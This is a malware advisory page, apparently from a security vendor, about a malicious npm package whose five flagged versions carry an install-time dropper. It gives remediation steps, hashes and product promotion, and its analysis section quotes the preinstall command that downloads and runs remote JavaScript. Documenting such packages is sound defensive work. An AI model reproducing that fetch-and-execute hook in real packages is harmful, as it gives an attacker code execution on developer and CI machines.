Which versions of sn-internal-testjgsakjdkjadkjah are malicious?

The following npm versions of sn-internal-testjgsakjdkjadkjah are flagged malicious: 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6. Treat any of these as compromised.

How do I remediate sn-internal-testjgsakjdkjadkjah if I installed it?

Remove sn-internal-testjgsakjdkjadkjah from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

I already installed sn-internal-testjgsakjdkjadkjah — how do I know if it already compromised me?

If sn-internal-testjgsakjdkjadkjah was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is sn-internal-testjgsakjdkjadkjah part of a known attack campaign?

Yes — sn-internal-testjgsakjdkjadkjah is associated with the IN-MAL-2026-007143, IN-MAL-2026-007140, IN-MAL-2026-007141, IN-MAL-2026-007142, IN-MAL-2026-007139 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find sn-internal-testjgsakjdkjadkjah across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for sn-internal-testjgsakjdkjadkjah (5 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging sn-internal-testjgsakjdkjadkjah across your stack and pipelines.

Malicious package

sn-internal-testjgsakjdkjadkjahnpm

Malicious code in sn-internal-testjgsakjdkjadkjah (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6265

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall sn-internal-testjgsakjdkjadkjah

What this malware does

package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, this downloads JavaScript from poc.amanrawat.com over an unpinned, unverified URL, overwrites the package's index.js with the fetched bytes, and immediately executes them with node under the installer's user privileges. The destination is a personal domain unrelated to any legitimate publisher infrastructure, the content is mutable (whatever bytes are served at request time are executed), and there is no hash, signature, or version pin. This is a textbook install-time remote code execution dropper: the attacker controlling poc.amanrawat.com can run arbitrary code on every machine that installs this package, including developer workstations and CI systems. Package metadata (name sn-internal-testjgsakjdkjadkjah, description 'This is our internal app for testing', author amanrawat matching the fetch domain) suggests a proof-of-concept publication, but the install-time behavior is functionally identical to a malicious dropper regardless of author intent.

Malicious versions

5 flagged

2.1.22.1.32.1.42.1.52.1.6

Indicators of compromise (SHA-256)

104d861afe48d8f90ff5241fd3c0324be8825e37e81dcf868585e4171658054b

7f6f1799ff0887b36122e417538f8bc76047b032dc1aa72837128f81fc04b377

a35eca57d05f39239e4d349c590b7ca3ec3ea8a1824d67187cc2291708be83b9

fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261

3133d2680df3f93221fb38517609280f9f443360719c5be25b13d89107f25a7c

Detection & response playbook

Malicious package

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for sn-internal-testjgsakjdkjadkjah (5 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging sn-internal-testjgsakjdkjadkjah across your stack and pipelines.
If you installed it — respond
Remove sn-internal-testjgsakjdkjadkjah from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.
Did it already run?
If sn-internal-testjgsakjdkjadkjah was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks sn-internal-testjgsakjdkjadkjah before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. sn-internal-testjgsakjdkjadkjah on npm has been identified as a malicious package (versions 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007143IN-MAL-2026-007140IN-MAL-2026-007141IN-MAL-2026-007142IN-MAL-2026-007139

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks sn-internal-testjgsakjdkjadkjah-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring